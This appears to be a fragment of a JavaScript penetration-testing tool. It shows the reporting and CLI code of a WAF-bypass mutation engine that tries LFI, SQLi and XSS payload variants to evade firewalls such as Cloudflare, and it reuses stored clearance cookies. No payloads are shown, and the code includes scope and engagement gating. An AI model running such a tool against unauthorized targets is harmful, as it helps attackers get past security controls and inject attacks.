    if (mutations.some((m) => m.family === 'http-game')) {
      gaps.push('path/method-override header variants target ORIGIN-DIRECT behavior -- Cloudflare normalizes or strips these headers at the edge, so a block here does not prove the origin signs the shape -- unobserved, not absent');
    }
    if (unstable.length) gaps.push(unstable.length + ' shape(s) passed once but FAILED stability re-verification (see unstable[]) -- recorded, never claimed');
    if (!passingShapes.length && !unstable.length) {
      gaps.push('no passing shape observed within budget -- absence of evidence is not evidence of absence; untested families are listed above');
    }

    return finish({
      ok: true,
      tool: 'wafbypass',
      url: u.href,
      class: klass,
      param,
      method,
      passingShapes,
      unstable,
      blockedCount,
      otherCount: others.length,
      others,
      controlBlocked,
      tried: used,
      mutationsTried,
      budget,
      paceMs,
      scope: { cidrs: scopeRes.scope, resolved: scopeRes.resolved },
      transport: ride ? ride.transport : gate.transport,
      ride: rideReport(ride),
      oracle: { marker: String(opts.marker), blockSigs, stability },
      gaps,
      note: 'a passing shape is marker-verified evidence on THIS target at THIS time (stability ' + stability + 'x) -- never a general WAF-bypass claim. Blocked shapes are signature observations; gaps are unobserved, not absent.',
      at: new Date().toISOString(),
    });
  } catch (e) {
    return refuse('wafbypass failed: ' + msg(e));
  }
}

// ---------------------------------------------------------------------------
// CLI surface (registered by the orchestrator in tools/cli.mjs):
//   wafbypass --url <u> --param <p> --class lfi|sqli|xss --marker <regex>
//             [--method POST] [--base <payload>] [--body-template <file>]
//             [--headers <file.json>] [--pace 1200] [--budget 60] [--first]
//             [--block-sig wordfence,cf-mitigated] [--scope <cidrCsv>] [--engagement <id>]
//             [--no-ride]
// ---------------------------------------------------------------------------
export const WAFBYPASS_USAGE = "wafbypass --url <u> --param <p> --class lfi|sqli|xss --marker <regex> [--method POST] [--base <payload>] [--body-template <file>] [--headers <file.json>] [--pace ms] [--budget n] [--first] [--block-sig csv] [--scope cidrCsv] [--no-ride] -- WAF-bypass mutation engine (marker-verified, stability-checked, ghost-ridden, scope-gated; auto-rides a valid vault clearance for the zone -- --no-ride forces cookieless)";

export async function cli(args, deps = {}) {
  const { readFileSync } = await import('node:fs');
  const a = Array.isArray(args) ? args.slice() : String(args || '').split(/\s+/).filter(Boolean);
  const flag = (name) => {
    const i = a.indexOf('--' + name);
    return i >= 0 && i + 1 < a.length ? a[i + 1] : null;
  };
  const opts = { ...deps };
  opts.param = flag('param') || undefined;
  opts.klass = flag('class') || undefined;
  opts.marker = flag('marker') || undefined;
  opts.method = flag('method') || undefined;
  opts.basePayload = flag('base') || undefined;
  if (flag('pace') != null) opts.paceMs = Number(flag('pace'));
  if (flag('budget') != null) opts.budget = Number(flag('budget'));
  if (flag('block-sig') != null) opts.blockSigs = String(flag('block-sig')).split(',').map((s) => s.trim()).filter(Boolean);
  opts.scope = flag('scope') || undefined;
  opts.engagement = flag('engagement') || undefined;
  opts.first = a.includes('--first');
  if (a.includes('--no-ride')) opts.ride = false;
  const tplFile = flag('body-template');
  if (tplFile) {
    try { opts.bodyTemplate = readFileSync(tplFile, 'utf8'); } catch (e) { return { ok: false, reason: 'could not read --body-template file ' + tplFile + ': ' + msg(e) }; }
  }
  const hdrFile = flag('headers');
  if (hdrFile) {
    try { opts.headers = JSON.parse(readFileSync(hdrFile, 'utf8')); } catch (e) { return { ok: false, reason: 'could not read/parse --headers file ' + hdrFile + ': ' + msg(e) }; }
  }
  const url = flag('url') || a[0];
  return wafBypass(url, opts);
}
